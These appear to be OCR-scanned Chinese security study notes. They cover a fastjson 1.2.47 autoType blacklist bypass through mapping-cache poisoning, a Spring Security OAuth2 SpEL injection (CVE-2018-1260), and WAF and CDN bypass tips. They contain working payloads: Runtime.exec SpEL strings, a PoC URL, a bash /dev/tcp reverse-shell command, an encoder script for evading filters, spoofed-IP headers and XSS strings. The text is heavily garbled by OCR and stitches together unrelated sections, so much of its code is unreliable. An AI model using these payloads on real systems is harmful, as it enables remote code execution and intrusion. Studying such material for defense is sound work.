for (int i = 3; i < className.length(); ++i) { 
har c = className.charAt(i); 
hash A= c; 
hash *- PRIME; 








* (Arrays.binarySearch(denyHashCodes, hash) >= ©) ( 


4 JSONException( “autoT i t si "3 
} 
© (Arrays.binarySearch(acceptHashCodes, hash) >= ©) { 
f (clazz == null) ( 
clazz = TypeUtils.loadClass(typeName, defaultClass 
} 
f (expectClass != null && expectClass.isAssignableFrol 
t new JSONException("type not matc! + typeN 
} 
return clazz; 
} 
} 
} 
if (clazz == null) { 
clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false) 
} 


return clazz; 


仔细 分 析 了 一 下 ， 可 以 发 现 无 论 是 白 名 单 开 启 与 否 ， 我 们 的 恶意 类 都 要 想 办 法 必须 要 从 第 8 步 
的 return clazz 出 去 才 有 机 会 。 


1 因为 白 名 单 关 闭 (手动 ) 时 ， 我 们 如 果 进 入 第 九 步 ， 会 百 分 百 跟 黑 名 单 正面 撞 上 ， 必 然 被 区 5 
我 们 只 能 在 这 之 前 溜 出 去 ， 机 会 就 在 6，7 步 中 。 

2. 白 名 单 开启 时 (ERA) ， 虽 然 在 第 五 步 时 ， 我 们 也 会 跟 黑 名 单 撞 上 ， 但 是 却 莫名 其 妙 的 会 有 一 
线 生机 ， 只 要 满足 TypeUtils.getClassFromMapping(typeName) != null (是 !=) 反而 可 
以 从 黑 名 单 中 逃 开 。 然 后 从 第 八 步 中 return 出 去 。 


那 往 之 前 看 clazz 可 以 从 哪里 赋值 ，5、6、7 三 个 地 方 ， 但 是 5 是 白 名 单 匹 配 才 返回 。 这 不 可 能 。 
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有 让 关注 6，7 这 两 个 操作 到 诺 是 干 哈 的 ， (其 实 根据 已 知 白 名 单 开 不 开 都 通 杀 的 特性 ， 肯 定 是 
k 4, TypeUtils.getClassFromMapping(typeName) 
2. deserializers.findClass(typeName) 


lL deserializers.findClass(typeName) 
Je &desesrializers, 一 个 hashmap 


* typene 
: private f IdentityHashMap<Type, ObjectDeserializer» deserializers 


id BE 
因为 我 们 是 从 中 取 值 ， 关注 一 下 它 是 在 哪里 赋值 的 ， 当 前 文件 搜索 deserializers,put o 














aSsLoader 
iGom.alibaba.fastjson.parser.ParserConfig#initDeserializers | 给 出 一 部 分 截图 
From(claz 
peName + 
) 
MapDeserializer. ir 
MapDeserializer. 
ltDeserializers 这 个 函数 是 在 parserConfig 类 的 构造 函数 中 初始 化 时 调用 的 ， 存 放 的 是 一 些 认为 没 
笑 危 害 的 固定 常用 类 。 理 所 当然 不 会 包含 我 们 的 利用 类 。 
外 之 外 还 有 两 个 类 会 影响 到 desesrializers 这 个 map 
> 
; BM Alibaba. fast json.parser.ParserConfig&getDeserializer(java.lang.Class-?», jav 
LEES RES A BR 
TT 
Xx 
未 
i o 个 类 中 会 4 a ar A r te ma 
会 往 deserializers 这 个 mapping 中 放 入 一 些 特 定 
会 有 一 ava.awt.* . java.time.* . java.util.Optional* 、 java.nio.file.Path ~ Map 
E 
zm try.class 、 以 及 在 服务 器 META-INF/services/ 目录 下 存放 的 class 文 件 ， 还 有 枚 举 类 的 一 


E 剂 断 。 对 于 一 些 数组 ， 集 合 ，map 等 再 调用 putDesserializer (这 也 是 另 一 个 会 影响 到 


3 estializers 这 个 map 的 类 ) 放 入 deserializers 这 个 mapping 中 。 


ui 
Pu 
m 



































































































































































































































在 这 个 类 中 对 于 类 名 有 着 严格 的 要 求 和 限定 ， 不 太行 。 看 下 一 个 。 










com.alibaba.fastjson.parser.ParserConfig#putDeserializer 
public void putDeserializer(Type type, ObjectDeserializer deserialize 
deserializers.put(type, deserializer); 


J 


代码 极其 简单 ， 但 是 只 在 ParserConfig#getDeserializer (就 是 上 面 那 个 类 ) 
和 initJavaBeanDeserializers 类 中 使 用 过 。 但 是 后 者 是 一 个 初始 化 函数 ， 我 们 同样 采 
值 。 


那么 我 们 好 像 发 现 我 们 的 输入 不 可 以 改变 deserializers 这 个 mapping 的 值 ， 从 而 自然 也 不 
checkAutoType 中 被 get 读 取出 来 ， 也 就 绕 过 不 了 。 


这 个 deserializers 在 checkAutoType 方 法 中 存在 的 意义 应 该 是 直接 放行 一 些 常用 的 类 , 来 
速度 。 


那 我 们 换 一 条 路 看 看 TypeUtils.getclassFromMapping(typeName) o 


TypeUtils.getClassFromMapping(typeName) 


先 看 getclassFromMapping : 


private static ConcurrentMap<String, Class<?>> mappings = new ConcurrentHasl 


public static Class<?> getClassFromMapping(String className) { 


return mappings.get(className); 


按照 套路 去 寻找 影响 这 个 mappings 的 put 方 法 。 搜 索 mappings.put ， 在 下 面 这 两 个 方法 中 有 
到 : 


com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings 
com. alibaba. fastjson.util. TypeUtils#loadClass(java.lang.String, java.lang.Cla 


看 addBaseClassMappings XPH, HAANRRK, 3X RAT ARE T, 但 是 它 是 一 个 没有 传 参 
的 方法 .… 这 样 我 们 就 没有 一 个 可 控 的 参数 去 控制 其 中 的 内 容 。 


518 








CLASS { 
: , byte.class); 
- mappings.put( t", short.class); 
Pmappings.put( int", int.class); 
- mappings.put( , long.class); 
E830 


在 两 个 没 毛病 的 地 方 调用 了 这 个 方法 : 


二 从 六 sage 
GypeUtilsjava 123 addBaseClassMappings(): 





a TypeUt addBaseClassMappings 


个 static 静 态 代码 块 : 





itic{ 
addBaseClassMappings(); 


个 clearClassMapping 方法 : 


Mic static void clearClassMapping(){ 
- mappings.clear(); 
- addBaseClassMappings(); 


不 可 控 。 
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为 个 有 mappings.put 的 位 置 TypeUtils .1loadclass ， 我 们 需要 详细 看 看 这 个 方法 : 




























































































































































































if(className == null || className.length() == °){ 


return null; 


Class<?> clazz = mappings.get(className) ; 
if(clazz != null)( 


return clazz; 
if(className.charAt(°) == Gri 


| 
Class<?> componentType = loadClass(className.substring( ), clas 
return Array.newInstance(componentType, ©).getClass(); 





if(className.startsWith( |") && className.endsWith( '; ))( 
String newClassName = className.substring(', className.length() 
return loadClass(newClassName, classLoader); 


tryf 


if(classLoader != null){ 
clazz = classLoader.loadClass(className) ; 
if (cache) { 


mappings.put(className, clazz); 


j 
return clazz; 
} 
) catch(Throwable e){ 
e.printStackTrace(); 


try 1 


ClassLoader contextClassLoader - Thread.currentThread().getContextt 
if(contextClassLoader != null && contextClassLoader !- classLoader)t 


clazz - contextClassLoader.loadClass(className); 


if (cache) { 
mappings.put(className, clazz); 


j; 


return clazz; 
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‘Loader im ) catcn(Throwable e){ 


clazz = Class.forName(className) ; 


mappings.put(className, clazz); 













clazz; 
} catch(Throwable e){ 
} 
ClassLoac ret clazz; 
} 
1 > 
由 发 现 如 果 可 以 控制 输入 参数 ， 是 可 以 往 这 个 mappings 中 写 入 任意 类 名 的 (从 而 绕 过 autocheck 
_ 黑白 名 单 ) 
看 这 个 类 在 什么 地 方 被 引用 。 
sloadClass(type 
s.loadClass(t 
loadClass(className 
= 者 都 是 在 ParserConfig#autocheck 这 个 我 们 需要 攻克 的 类 中 ， 如 果 能 在 那里 调用 loadClass 
和 一 个 恶意 类 去 加 载 。 那 就 已 经 完成 了 我 们 的 最 终 目的 ， 根 本 不 需要 通过 mappings 这 个 空子 去 
需要 看 TypeUtils.java 中 的 引用 处 。 
Ublic Static Class<?> loadClass(String className, ClassLoader classLoader) { 
return loadClass(className, classLoader, J2 
} 
| 为 true， 一 个 好 消息 ， 因 为 有 三 处 修改 mapping 的 地 方 ， 两 个 地 方 需要 cache 为 true。 
ntextCl 
oader){ 


compon: 


foadClass(n sName. classloader} 





[- Typevtilsjava 


> 


E3 
AE 


可 以 看 到 在 这 个 类 中 会 自己 引用 自己 的 类 ， 跳 来 跳 去 ， 但 是 也 有 外 部 的 类 引用 当前 类 。 这 
SESH. (因为 一 个 底层 的 工具 类 ， 不 可 能 被 我 们 直接 调用 到 ) 
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慢 慢 看 ， 把 跳出 去 的 接口 理 出 来 


/com/alibaba/fastjson/serializer/MiscCodec. java#deserialze(Default JSONParsey 5 


lo: 


z = loadClass(className 


loadClass(classN 


这 两 个 静态 的 ， 没 搞 头 ， 就 不 看 了 。 
只 有 上 面 一 个 跳出 去 Misccodec.java#deserialze 的 ， 我 们 再 过 去 看 看 : 
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public ETT ze(DeraultJs arser parser, Type clazz, Object fieldN 





JSONLexer lexer = parser.lexer; 


/ zb 


if (clazz == InetSocketAddress.class) { 


Object objVal; 
/ r3. 


if (parser.resolveStatus -- DefaultJSONParser.TypeNameRedirect) ( 
parser.resolveStatus = DefaultJSONParser.NONE; 
parser.accept(JSONToken.COMMA) ; 
if (lexer.token() == JSONToken.LITERAL STRING) { 


if (!"vai".equals(lexer.stringVal())) { 
throw new JSONException("syntax error"); 





lexer.nextToken(); 
) eise { 


throw new JSONException("syntax error"); 


parser.accept(JSONToken.COLON) ; 


objVal - parser.parse(); 


parser.accept(JSONToken.RBRACE) ; 
} else { 


objVal = parser.parse(); 


String strVal; 


if (objVal -- null) ( 
strVal = null; 

} else if (objVal instanceof String) { 
strVal = (String) objVal; 

} else { 
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(strVal == null || strVal.length() == ©) { 
} 
(clazz == Class.class) { 
(T) TypeUtils.loadClass(strVal, parser.getConfig(). 
} 


那么 经 过 分 析 ， 我 们 可 以 得 到 的 关注 点 又 跑 到 parser.resolvestatus 这 上 面 来 了 


1. 4 parser.resolveStatus == TypeNameRedirect 我 们 需要 json 串 中 有 一 个 "val":" 恶 意 类 
名 "， 来 进入 if 语句 的 true 中 ， 污 染 objVal， 再 进一步 污染 strVal。 我 们 又 需要 clazz 为 class 类 来 
a XE iA Pt A loadClass. 


所 以 一 个 json 串 的 格式 大 概 为 "Gtype"-"java.lang.Class","val":" X E3Eg" ”这样 一 个 东 
西 ， 大 概 如 此 。 


2. S parser.resolveStatus ! = TypeNameRedirect 进入 if 判断 的 false 中 ， 可 以 直接 污染 
objVal。 再 加 上 clazz=class 类 


大 概 需 要 一 个 json 串 如 下 : "@type"="java.lang.Class", "恶意 类 名 '" , 


至 于 哪里 调用 了 MiscCodec.javasdeserialze ， 查 看 引用 处 其 实 可 以 发 现 这 是 一 个 非常 多 地 方 会 、 
调用 到 的 常用 函数 ， 就 比如 解析 过 程 中 | 
BY com.alibaba.fastjson.parser.DefaultJSONParser&parseObject(java.util.Map, 
java.lang.0bject)-38417 


izer deserializer = config.getDeserializer(clazz); 

= deserializer.getClass() 

ializer.class.isAssignableFrom(deserClass) 

lass != JavaBeanDeserializer.ci 

serClass != ThrowableDeserializer. yt 
.setResolveStatus(WONE) ; 

} tbe 
Object obj = deserializer.deserialze( t clazz, fieldName); 


obj 


JE A@Epayload 
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be 信息 中 ， 我 们 就 不 必 一 直 大 海 摸 是 。 之 前 拿 到 了 两 个 分 支 paylaod， 拿 一 个 可 能 的 
水 看 看 能 不 能 往 TypeUtils.getClassFromMapping(typeName) 里 面 的 mapping 污 染 


J ibaba.fastjson.parser .DefaultJSONParser#parse0bject(java.util.Map, 
ng ,Object) 


ENEFA, ROTI: 


/到 

final 0bj: { 

T 是 che 

1"" 恶 意 类 azz = config.checkAutoType(typeName, , lexer.getFeatures()); 
class 类 来 1 1 
Resolves: 

1 
Is.setResolveStatus(TypeNameRedirect); 
BBATypeU: 


ject obj - deserializer.deserialze( , clazz, fieldName); 


X HE— NR 


接 污染 
ibaba. fast json.parser .ParserConfig#checkAutoType( java.lang.String, 
Ng-Class<?>, int) 这 个 分 析 过 了 。 







clazz. tozz: Java. Lang. CLdss " 


Balizers. findclass(typeName) 出 去 ， 这 是 我 们 之 前 分 析 过 的 一 处 可 以 绕 过 白 名单 黑 
po. 但 是 这 里 只 存放 一 些 默 认 类 ， 不 可 污染 。 而 我 们 的 class.class 就 在 这 个 默认 类 列 
直接 出 去 了 。 (比如 class.class 怎 么 也 不 会 匹配 到 黑 名 单 ， 不 这 里 出 去 ， 也 是 可 以 下 面 
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GetResolvestatus) 


Variables 


RUNNING L Yy +> 90 


再 是 ， 给 ResolveStatus 赋 值 了 TypeNameRedirect， 这 样 到 deserialze 里 面 就 可 以 确定 了 分 支 当 
预计 吻合 。 这 个 payload 砸 的 没 错 。 





可 以 发 现 进 入 了 我 们 预计 希望 进入 

的 com.alibaba.fastjson.serializer .MiscCodec#deserialze , 可 以 看 到 上 面 有 复杂 的 例 | 
上 断 ， 这 就 是 得 到 初步 的 思路 之 后 磺 payload 的 好 处 ， 如 果 满 足 条 件 ， 我 们 就 不 用 费力 气 去 想 这 些 是 
喻 的 ， 反 正 默认 进来 了 ， 不 满足 我 们 再 去 看 哪里 不 符合 就 行 。 
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(parsef.cesdiveStatus == DefaultJSONParser. TypeName 
parser.resoivestatus = DefaultJSONParsers NONE; 
parser.accept(JSONToken. COMMA) 


(lexer.token().== JSONToken. S 
(1! -equals(lexer.stringVal())) { 
JSONException( 
} 
lexer.nextToken() | 
{ 
JSONException( 


parser.accept( JSONToken. 
= parser.parse() 


parser accept (JSONToken. RBRACE) © 


biVal parser.parse( ) 


jJeserialze(} 


Variables 


Uem Sias 


oo lexer = 
900 objVal = 


[D parser = 
@ clazz = (Cla 
© fieldName = null 


= fexer = USONS 


> 
> 
b = this = (MiscC 
> 
> 


= objVal = < 
RRHH. 


(objval == null) { 
strVal = null; 
String) { 


if (objVal instanceof JSONObject) { 


3 BF obiVal=e— String, i$ TELA strVal 










Class<?> loadClass(String className, ClassLoader classloader) -, 





LoadClass(className, classloader rue) 


ARikcacheAtrue, ZAI TAIBY RH BlcacheNtrueMAMRRE MRS. PRA E 
况 可 以 污染 我 们 的 关键 mapping。 看 看 会 进入 哪 一 个 


一 种 





contextCla 


Cl 


OO mappings = 
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().getContext€lessloader( } 
lassLoader){ 





clazz. clazz. “lass tou sun Powbet AdbeRonsel Re: etinpt gt 





"class.com.sun.rowset JdbcRowSetlmpl 








mappings = y Map&541;_size = 87 TA S MAS ; 
TA 


个 if 中 ， 帮 我 们 加 载 了 一 个 classloader， 再 因为 上 一 层 的 cache 默 认为 rue， 就 真 的 执行 成 功 
f mappings. put 放 入 了 我 们 的 恶意 类 名 ! 


完美 穿针引线 ， 一 环 扣 一 环 ， 往 mappings 中 加 入 了 我 们 的 恶意 类 。 这 就 是 大 黑 阔 嘛 ， 爱 了 爱 了 。 





eUtils (com.alibaba.fastson.util) 





lec (com.alibaba.fasyson.serializer) 





384, DefaultiSONParser (com.alibaba.fastjson.parser) 
Default) SONParser (com.alibaba,fastjson.parser) 
Default) SONParser (com.alibaba. tastison. parser) 


ON (com.alibabatastjson) 





JSON (com.alibaba.fastjson) 
ISON (com.alibabatasyson) 
lain:33, 0108/72977 ; 


— ——MÀ 的 mapping 有 了 哈 用 呢 。 再 进一步 @type 就 好 。 


我 们 会 幸福 的 4 
FREON RAR BRE IK 





就 会 一 直 保 持 ， 然 后 就 可 以 随便 打 了 。 
但 是 之 后 为 了 不 让 负载 均衡 ， 平 摊 payload 造 成 有 几率 失败 ， 就 变 成 了 以 下 一 个 。 


hsb E 
Fi 3 D 
ra v 
} 
} 
审计 结束 完美 


530 


Boolean 












Sn 
2 


Caci 


,2.48 修 复 


TERE. 修改 了 cache 这 一 处 。( 右 侧 为 1.2.47 代 码 ) 


来 应 该 进入 一 个 loadclass (两 个 参数 ) 的 方法 ， 然 后 默认 cache 为 true， 在 进入 三 个 参数 的 
oadclass。 





在 这 边 直 接 指定 过 来 三 个 参数 loadClass 同 时 cache 为 false。 






ii 


OD, 在 同样 payload 执 行 时， 我 们 原来 说 会 改变 mappings 的 第 二 处 就 因为 cache 而 无 法 改变 。 


Throwable e)4 
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但 是 我 们 还 记得 之 前 分 析 时 有 第 三 处 不 需要 校 验 cache 的 mappings 赋 值 ! 精神 一 振 ， 这 就 是 


SRA! 


然后 . 








这 就 是 程序 员 的 力量 么 ， 两 行 代码 秒杀 一 切 ， 爱 了 爱 了 ，0day 再 见 。 





1.2.48 以 后 


在 这 个 通 杀 payload 之 后 ， 就 又 恢复 了 一 片 平静 的 ， 在 服务 端 手动 配置 关闭 白 名 单 情况 下 的 黑 名 曾 
绕 过 黑 名 单 的 战争 。 这 个 战争 估计 随 着 代码 不 断 迭 代 ， 也 是 不 会 停止 的 。 


之 后 又 出 了 一 个 影响 广泛 的 拒绝 服务 漏洞 ， 在 1.2.60 版 本 被 修复 。 

当然 这 与 反 序列 化 就 无 关 了 ， 同 时 这 篇 文章 也 写 得 太 久 ， 太 长 了 。 也 算是 给 2019 做 个 结尾 吧 。 
所 以 ， 

2020 年 ， 新 年 快乐 。 

要 不 下 场 雪 吧 ? 


参考 
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ETRS. o BERBEDUURBIT, IBRLEEBHTRUR (^s 
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Spring-securiy-oauth2 (CVE-2018-1260) 
漏洞 描述 


当 开 发 者 使 用 默认 scope 人 参数 或 者 将 scope 参 数 置 空 时 ， 攻 击 者 通过 注入 恶意 scope 人 参数， 在 和 
已 登录 用 户 进行 授权 时 ， 将 scope 参 数 直接 拼接 到 模板 中 ， 在 模板 进行 泻 染 时 产生 spel 表 达 
从 而 造成 远程 代码 执行 。 


路 径 


e /oauth/authorize 


* response type 

。 client id: 客户 端 id 

。 scope: 用 户 分 配 的 权限 
。 redirect uri: 重 定向 的 url 


poc 


/oauth/authorize?client_id=client&redirect_uri=&response_type=code&scope=%24 


oauth2.0 介 绍 与 漏洞 复 现 
1. 几 个 认证 配置 参数 介绍 


OAuthSecurityConfigjava 中 的 configure 方 法 可 以 定义 以 下 这 几 个 变量 ，scope 用 于 限定 用 户 
权限 


*. 


clientId : (WA) BP imp, 

secret: (对 于 受信 任 的 客户 端 是 必需 的 ) 客户 端 密 钥 (如 果 有 ) 。 

scope : 客户 端 受 限制 的 范围 。 如 果 范 围 未 定义 或 为 空 (默认 值 ) ， 则 客户 端 不 受 范围 的 限制 。 
authorizedGrantTypes : 授权 客户 使 用 的 授权 类 型 。 默认 值 为 空 。 

authorities : 授予 客户 端的 权限 (常规 的 Spring Security 权 限 ) 。 


oauth 认 证 流程 


用 户 一 (认证 请 求 ) 一 > 客户 端 用 户 < 一 《认证 成 功 ) 一 客户 端 用 户 一 (授权 标志 ) 一 > 客户 
端 用 户 <— (access token) 一 客户 端 用 户 一 (access_token) 一 > 客户 端 AP < 一 CR 
源 ) 一 客户 端 


2. 复 现 流程 


j> 
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Tua 





lliitps-//github.com/wanghongfer/spring-securtty-oauth2-example F 源码 ， 导 入 到 ideaF 
3 53, = 


o 按照 上 述 网 址 的 readMe， 导 入 数据 库 ， 修 改 数据 库 


o 修改 spring-security-oauth2-example/src/main/resources/application.properties 的 mysql 配 


置 

o 访问 

localhost :8080/oauth/oauthorize?client_id=client&response_type=code&redi 
4 > 
5 输入 用 户 名 密码 进行 认证 

o 代码 执行 成 功 


Stm PESOS EY vee IIA JSA EY now EI sal 
OAuth Approval 


Do you authorize ‘client’ to access your protected resources? 
e scope.java.lang.UNIXProcess@6d6304d0: Approve & Deny 


Authorize 





Hed gu sp 


jplications/Calculator.app/Contents/MacOS/Calculator 


执行 ， 回 显 invalid parameter! 


n /etc 


了 三 个 计算 机 ， 也 就 说 执行 了 三 遍 scope 的 spel 表 达 式 

题 需要 在 代码 分 析 中 弄 清楚 

起 要 输入 更 多 的 恶意 代码 怎么 办 呢 ? 希望 通过 代码 分 析 找到 解决 办 法 
析 的 目的 


一 遍 0auth authorize 的 流程 
决 spel 表 达 式 为 什么 执行 了 三 次 的 问题 
决 spel 表 达 式 为 什么 不 能 加 入 空格 的 问题 


决 想 要 输入 更 多 恶意 代码 的 问题 
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代码 分 析 


AuthorizationEndpoint.java 中 的 authorize 方 法 


Bl /oauth/authorize 


该 方法 就 是 authorize 认 证 整体 的 流程 


@RequestMapping(value = th/authorize") 


public ModelAnd\ 


设置 几 个 值 





oauth2RequestValidator.validateScope(authorizationRequest, clien 
检查 是 否 有 默认 的 准许 


model.put("authorizationRequest", authorizationRequest); 
return getUserApprovalPageResponse(model, authorizationRequest, ( 


。 设置 authorizationRequest， 包 含 以 下 几 个 值 


o clientid 
o redirecturi 
o response type 
o scope 
值得 注意 的 是 ， 以 下 代码 将 parameters (用 户 输入 参数 字典 ) 作 一 定 转换 之 后 存 入 


authorizationRequest 


这 里 的 代码 导致 了 当 输 入 s(T(java.lang.Runtime).getRuntime().exec("open 
/etc")) 变 成 


$(T(java.lang.Runtime).getRuntime().exec("open 与 /etc")} , 即 以 空格 进行 分 隔 


解决 了 spel 表 达 式 为 什么 不 能 加 入 空格 的 问题 
AuthorizationRequest authorizationRequest = getOAuth2RequestFactory().creat 

。 Validscope 方 法 
validscope 方 法 判断 scope 是 否 有 效 


clientScopes 是 OAuthSecurityConfig.java 中 配置 的 .scope() 
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“if (clientScopes != null && !clientScopes.isEmpty()) { 
for (String scope : requestScopes) { 
if (!clientScopes.contains(scope)) { 


throw new InvalidScopeException("Invalid scope: " + scope, clien 
} 
} 
(AOR 
if (requestScopes.isEmpty()) { 
B, new InvalidScopeException(. Empty scope (either the cl 
b 
是 否 有 默认 的 准许 


erApprovalPageResponse 方 法 
使 用 该 方法 返回 response ， 该 方法 进行 泻 染 时 产生 了 spel 注 入 


e UserApprovalPageResponse(model, authorizationRequest, (Authentication) pr 


ApprovalPage 


fward: /oauth/confirm_access 


UthorizationRequest” 

Ponse type" -> "code" 

eGiréct uri" -> "http://www.baidu.com" 
S"-» size =1 

nt id" -> "client" 


> "SCT (java.lang.Runtime).getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator"))" 
AEG ; 
会 重 定向 至 /oauth/confirm access 


在 /oauth/confirm acces 所 mapping 的 WhitelabelApprovalEndpointjava 中 下 断 点 
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Match case Words Regex ? © File mask: “java ï 
多 


Find in Path 
| 


inProject Module Directory Scope Ali Places bó c 


—— 


mappings.put('"/oauth/confirm access", 
private String userApprovalPage = “forward: foauth/confirm access"; 
authorizationEndpoint.setUserApprovalPage(extractPath (mapping, "/oauth/confirm access ')); 


li eas woauth/contirm access 





WhitelabelApproy;: 


SR3EWhitelabelApprovalEndpoint.javaffügetAccessConfirmation737X 


Bl /oauth/confirm access 


GRequestMapping("/oauth/confirm access") 


ublix 4odelAn( 


F i 


String template - createTemplate(model, request); 
f (request.getAttribute( rf") != null) (f 
model.put( © , request.getAttribute( ae 


iturn new ModelAndView(new SpelView(template), model); 


。 createTemplate 方 法 
将 scope 与 csrf 添 加 至 模板 中 
createTemplate 方 法 代码 如 下 


protected String 


String template = TEMPLATE; 


if (model.containskey(“scopes") || request.getAttribute("“scopes”) !- nu ; 
template = template.replace(" %", createScopes(model, request)): 





} 
else { 

template = template.replace("%scopes%", “").replace("%denial%", DENTAL 
y 


return template; 


o createScopes(model, request) 方 法 


将 SCOPE 中 的 %scope% 与 %key% 都 替换 为 scope 
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for (String scope : scopes.keySet()) { j » E w 
String approved = ‘truc’.equals(scopes.get(scope)) ? " checked" : "'; 
String denied = !"true".equals(scopes.get(scope)) ? " checked" : ""; 
String value = SCOPE.replace("%scope%", scope).replace( *key*", scope 
builder.append(value); 
} 
4 b 


而 SCOPE 的 html 中 含有 两 个 %key% 和 一 个 %scope% ， 因 此 当 spel 表 达 式 中 存在 执行 计 
算 机 命令 时 ， 会 弹 三 次 计算 机 ， 因 此 解决 了 spel 表 达 式 为 什么 执行 了 三 次 的 问题 


<html> 
<head></head> 
<body> 
«li» 
«div class="form-¢ MES 
%SCOPe%: 
<input type="radio" name="%key%" value="true" %approved%="" />Approv 
<input type="radio" name="%key%" value="false" %denied%="" /»Deny 
«/div»«/li» 
«/body» 
</html> 








SpelView(template) 
进行 泻 染 时 ， 即 调用 SpelView 的 render 方 法 ， 会 去 调用 以 下 代码 中 的 
Expression expression = parser.parseExpression(name) ; 


从 而 引起 spel 表 达 式 注入 


Bdblic sp i 
this,template = template; 
this.prefix = new RandomValueStringGenerator().generate() + "i"; 
this.context.addPropertyAccessor(new MapAccessor()); 
this.resolver = new PlaceholderResolver() { 
public String { 

Expression expression = parser.parseExpression(name) ; 

Object value = expression.getValue(context); 

return value == null ? null : value.toString(); 
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以 反弹 shell 命 令 为 例 b^ 
Li 
/bin/bash -c -i »&/dev/tcp/127.0.0.1/8888«&1 
使 用 特殊 的 java 语 句 


T(java.lang.Character).tostring(x) : 能 将 ascii 码 形式 的 x 转换 为 String 类 型 ， 再 使 
用 concat 连接 









使 用 以 下 脚本 将 命令 转换 
s="123"// 修 改 为 exec 中 的 执行 语句 
final="T(java,lang.character),tostring("+str(ord(s[6]))+") 
tor Loan Sli 
final+=" 
final*- ava.ia 
final+=str(ord(i)) 
final+=' 
final+=" 
print(final) 
恶意 spel 表 达 式 为 


%24%7bT(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString( 
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ICDN 


g www. baidu.com 
.baidu.com 


okup www.baidu.com 


实 IP， 绕 过 CDN 


= 二 般 可 以 通过 此 方法 绕 过 。 





Ld 
-bypass 
关于 WAf 的 绕 过 方法 。 
rT MEME Nb iot id S dd 4r 
š | a À 
Firewall Switch Web Application Switch Web Server 
Firewall 
EE | r 
SSL Connection Between Client and WAF | SSL Between WAF and Web Server 

WAF Terminates SSL on both sides using it's own 
keys 
Self-signed and trusted certificate for internal web 
server 


Normally 3" party CA-issued certificate for web side 
for non-organizational users to maintain trust model 


NS 历史 记录 ,找到 后 修改 host 文 件 即 可 : 
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- * 
http://site.ip138.com/www.baidu.com 


https://dnsdb.io/zh-cn/ 
https://x.threatbook.cn/ 
http://toolbar.netcraft.com/site report?url- 
https://censys.io/ipv4?q-www.baidu.com 
http://viewdns.info/ 
https://community.riskiq.com/home 


https://securitytrails.com/list/apex domain/jgbz.baidu.com 


RSS 邮 箱 订 阅 ， 查 看 邮件 源码 


查看 邮件 源码 : 

















全 部 Ta BED.. 
Rockit f Pa quanzi aura cn (unknown [101 251 198 zi 


by newmx39.qq.com (NewMx) with SMTP id 
| for«13. @aa.com>; Mon, 22 Oct 2018 12:23:53 +0800 
| X-QQ-FEAT: 9imNE 1 VfKBAkzAopMc79UQNouK « VNbfT9rtEacqaf/Z2GcqAn 1zRZSOr1gf] 
UOfLngBYLUh/HoE/8RhqqpmiCsW2CrXNByVXSylutlG 1p AEYkqZIpmVWnhg8pbUE,B 
IJdOqualpd8UCGSdsOIBVzfpnjauayj4iVu/G/J&XbGEFfyIdIHRxElluHPi8lgQjrmoizi 
Q8R6pnOUAksYOTIKtc/OoVIfEo*bkw/eJTWVIDOrOzBHJDjluLVHztelCox«zIR 1/oSr4FF 
Iz2bGROp3KOn/Uc&qmGbgia08SgPKVI5tH9SDuDHKV*e/rSSaZdm5cD*z53HHEj39XC 
| 1YtFXtYx4Dz8Y 1uENQ= 

X-QQ-MAILINFO: M9mpTqh4QKvq*fRKp6JicEwJISI/2PNjYCdEv6KF qTJOqUnMhhEFzSf^ 
RfMLr/K4zszDVBsrB2w1eQRjaSn30E 7ROPyAITftNvuv9M10rn8XaNL7BzBBNwggxDR. 
HEF 4SZ+JOALE93/09APKIIM7e 1njIL/s WUFSQNhcxBjhGOpay naid 
| mmRndSk9qvqPWCt2p8QWybgQoFF5lIknOhu51Ai7C56Ruoy0Zc 
| X-QQ-mid: mx39t1540182233t8u5gqs0q 


8 X-NN-CSender infnA@ouanzi aura en 


服务 器 向 外 请 求 (DNSLOG) 
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Be Public DNS (8.8.8.8, 8.8.4.4) 

DNS (208.67.222.222, 208.67.220.220) 

DNS Family (208.67.222.123, 208.67.220.123) 
MNS (216.146.35.35, 216.146.36.36) 

odo Secure (8.26.56.26, 8.20.247.20) 

FaDNS (156.154.70.1, 156.154.71.1) 


Fon ConnectSafe (199.85.126.10, 199.85.127.10) 


只是 服务 路 支持 的 算法 ， 选 用 TLSv1 256 bits ECDHE-RSA-AES256-SHA, $EGTULESWAFAOGZARSUS SEES) 





Ciphers ECDHE-RSA-AES256-SHA https://waf-test.lab.1 


ocal/s 


WAF 支 持 的 算法 如 下 : 00 2 


SSLv3 


SSL RSA WITH NULL MD5 

SSL RSA WITH NULL SHA 

SSL RSA WITH RC4 128 MD5 

SSL RSA WITH RC4 128 SHA 

SSL RSA WITH DES CBC SHA 

SSL RSA WITH 3DES EDE CBC SHA 

SSL RSA EXPORT WITH RC4 40 MD5 
SSL RSA EXPORT WITH DES40 CBC SHA 


TLS/1.0-1.2 


TLS RSA WITH NULL SHA256 

TLS RSA WITH AES 128 CBC SHA 

TLS RSA WITH AES 256 CBC SHA 

TLS RSA EXPORT1024 WITH RC4 56 MD5 

TLS RSA EXPORT1024 WITH RC4 56 SHA 

TLS RSA WITH AES 128 CBC SHA256 

TLS RSA WITH AES 256 CBC SHA256 

TLS RSA WITH RC4 128 MD5 = ( 0x000x04 ) 
TLS RSA WITH RC4 128 SHA = ( 0x000x05 ) 
TLS RSA WITH DES CBC SHA = ( 0x000x09 ) 


method £x. 


1. 改变 method，get 改 post，post 改 上 传 (还 有 cookies 传 值 ) 


2. 改变 method 为 不 规则 ， 比 如 改 get,post 为 HELLLOXX 等 ( 某 些 apache 版 本 ) 


Header IP 绕 过 (一 般 应 用 拦截 ， 非 WAF) 
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=- ¥ + 


rwarded-for: 127.0.0.1 
mote-IP: 127.0.0.1 
dginating-IP: 127.0.0.1 
smote-addr: 127.0.0.1 


lient-ip: 127.0.0.1 
ader content-type 绕 过 


[ent -type 改 成 其 他 的 

ent -type 必 须 指定 唯一 一 个 类 型 ， 例如 application/octet-stream (比如 安全 狗 ) 
e t-type 改 成 不 规则 的 text/htmlxxxxxx 

tent-Type: multipart/form-data ; boundary=0000 

ent -Type: mUltiPart/ForM-dATa; boundary=0000 

e t-Type: multipart/form-datax; boundary=0000 

ent-Type: multipart/form-data, boundary=0000 

nt -Type: multipart/form-data boundary=0000 

nt-Type: multipart/whatever; boundary=0000 

int-Type: multipart/; boundary-0000 


n t-Type: application/octet-stream; 
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Seven 
?id=alert(document[ 'cookie']) 


?id="; location=location.hash)//#0={};alert(0) 
